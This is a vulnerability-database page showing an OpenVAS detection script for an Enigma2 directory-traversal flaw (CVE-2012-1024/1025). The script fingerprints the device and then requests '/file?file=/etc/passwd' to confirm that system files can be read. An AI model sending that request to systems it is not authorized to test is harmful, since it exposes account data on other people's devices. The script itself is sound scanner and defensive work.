Lucene search
K

Enigma2 'file' Parameter Information Disclosure Vulnerability

🗓️ 10 Jan 2012 00:00:00Reported by This script is Copyright (C) 2012 Greenbone Networks GmbHType 
openvas
 openvas
🔗 plugins.openvas.org👁 15 Views

Enigma2 'file' Parameter Information Disclosure Vulnerability. Fails to validate user input, leading to file download by webserver process

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2012-1024
8 Feb 201200:00
cve
CVE
CVE-2012-1025
8 Feb 201200:00
cve
Cvelist
CVE-2012-1024
8 Feb 201200:00
cvelist
Cvelist
CVE-2012-1025
8 Feb 201200:00
cvelist
EUVD
EUVD-2012-1062
7 Oct 202500:30
euvd
EUVD
EUVD-2012-1063
7 Oct 202500:30
euvd
NVD
CVE-2012-1024
8 Feb 201200:55
nvd
NVD
CVE-2012-1025
8 Feb 201200:55
nvd
OpenVAS
Enigma2 Information Disclosure Vulnerability (Jan 2012) - Active Check
10 Jan 201200:00
openvas
Prion
Directory traversal
8 Feb 201200:55
prion
Rows per page
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_enigma2_51330.nasl 5956 2017-04-14 09:02:12Z teissa $
#
# Enigma2 'file' Parameter Information Disclosure Vulnerability
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_summary = "Enigma2 is prone to an information-disclosure vulnerability because it
fails to sufficiently validate user-supplied data.

An attacker can exploit this issue to download local files in the
context of the webserver process. This may allow the attacker to
obtain sensitive information; other attacks are also possible.";


if (description)
{
 script_id(103381);
 script_bugtraq_id(51330);
 script_version ("$Revision: 5956 $");
 script_cve_id("CVE-2012-1024", "CVE-2012-1025");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");

 script_name("Enigma2 'file' Parameter Information Disclosure Vulnerability");

 script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/51330");
 script_xref(name : "URL" , value : "http://dream.reichholf.net/wiki/Enigma2");

 script_tag(name:"last_modification", value:"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $");
 script_tag(name:"creation_date", value:"2012-01-10 10:48:24 +0100 (Tue, 10 Jan 2012)");
 script_category(ACT_ATTACK);
 script_tag(name:"qod_type", value:"remote_vul");
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
 script_dependencies("find_service.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_tag(name : "summary" , value : tag_summary);
 exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
include("global_settings.inc");
   
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

url = "/web/movielist.rss"; 

if(http_vuln_check(port:port, url:url,pattern:"Enigma2 Movielist")) {

  url = "/file?file=/etc/passwd";

  if(http_vuln_check(port:port, url:url,pattern:"root:.*:0:[01]:.*:")) {
     
    security_message(port:port);
    exit(0);

  }  

}


exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Apr 2017 00:00Current
6.2Medium risk
Vulners AI Score6.2
EPSS0.03662
15